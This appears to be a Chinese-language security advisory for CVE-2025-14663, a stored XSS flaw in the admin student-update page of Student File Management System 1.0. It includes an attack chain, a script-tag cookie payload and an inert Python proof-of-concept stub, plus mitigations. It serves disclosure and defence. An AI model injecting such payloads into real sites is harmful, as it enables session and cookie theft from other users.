CVE-2025-14663 code-projects Student File Management System 1.0 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-14663

漏洞类型

XSS

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

code-projects Student File Management System 1.0

漏洞概述

CVE-2025-14663是code-projects团队开发的Student File Management System 1.0版本中的一个跨站脚本(XSS)漏洞。该漏洞位于管理后台的update_student.php文件，未对用户输入进行充分的过滤和验证，攻击者可通过构造恶意脚本来窃取用户会话cookie、劫持用户账户或进行钓鱼攻击。由于该漏洞需要高权限管理员账户才能利用，且需要用户交互才能触发，因此CVSS评分仅为2.4，属于低危漏洞。该漏洞已于2025年12月14日公开披露，可能已被恶意利用，建议相关用户尽快采取防护措施。

技术细节

该漏洞为存储型XSS(Stored XSS)漏洞，存在于/admin/update_student.php文件的学生信息更新功能中。攻击者以管理员身份登录系统后，在更新学生信息时（如学生姓名、邮箱等字段），注入恶意的JavaScript代码。由于系统未对输入进行HTML实体编码，该恶意代码会被永久存储在数据库中。当其他管理员或用户访问包含该学生信息的页面时，恶意脚本会在其浏览器上下文中执行。攻击者可利用此漏洞窃取受害者Cookie、进行按键记录、修改页面内容或重定向用户到恶意网站。由于攻击需要管理员权限和高交互性，漏洞利用难度较高，但仍存在安全风险。

攻击链分析

STEP 1

步骤1

攻击者获取管理员账户凭据，登录Student File Management System管理后台

STEP 2

步骤2

导航至学生信息管理页面，选择要编辑的学生记录或新增学生

STEP 3

步骤3

在学生信息表单字段（如姓名、邮箱等）中注入XSS恶意载荷，如<script>alert(document.cookie)</script>

STEP 4

步骤4

提交更新请求，恶意脚本被存储到数据库中

STEP 5

步骤5

当其他管理员或用户访问包含该学生信息的页面时，恶意脚本在其浏览器中执行

STEP 6

步骤6

攻击者可通过XSS窃取用户Cookie、会话令牌或进行其他恶意操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-14663 PoC - Stored XSS in Student File Management System
# Affected Component: /admin/update_student.php
# Attack Type: Stored XSS

import requests
import sys

target_url = "http://target-site.com"
admin_path = "/admin/update_student.php"

# Malicious JavaScript payload for XSS
xss_payload = "<script>alert(document.cookie)</script>"

def exploit_xss():
    """
    Exploit the stored XSS vulnerability in update_student.php
    This PoC demonstrates how to inject malicious JavaScript
    through the student update functionality.
    """
    # Prepare the malicious request
    # The payload is injected into student information fields
    data = {
        'student_id': '1',
        'name': xss_payload,
        'email': f'test<script>alert("XSS")</script>@example.com',
        'action': 'update'
    }
    
    # Send the malicious request
    # If vulnerable, the XSS payload will be stored and executed
    # when the student record is viewed
    print(f"[*] Sending XSS payload to {target_url}{admin_path}")
    print(f"[*] Payload: {xss_payload}")
    
    # Note: Authentication with admin credentials required
    # session = requests.Session()
    # session.post(login_url, data=credentials)
    # response = session.post(target_url + admin_path, data=data)
    
    return True

if __name__ == "__main__":
    exploit_xss()

影响范围

code-projects Student File Management System 1.0

防御指南

临时缓解措施

在修复前，可采取以下临时缓解措施：1)限制管理后台访问权限，确保只有受信任的管理员才能访问；2)启用Web应用防火墙规则拦截XSS攻击特征；3)对管理会话实施严格的Cookie安全策略；4)定期审计日志文件，检测可疑的脚本注入行为；5)考虑暂时禁用学生信息修改功能，直到漏洞修复完成。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-14663
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-14663
3 Details https://www.cvedetails.com/cve/CVE-2025-14663/
4 VulDB https://vuldb.com/cve/CVE-2025-14663
5 Link https://code-projects.org/
6 Link https://github.com/jjjjj-zr/jjjjjzr16/issues/1
7 Link https://vuldb.com/?ctiid.336395
8 Link https://vuldb.com/?id.336395
9 Link https://vuldb.com/?submit.714018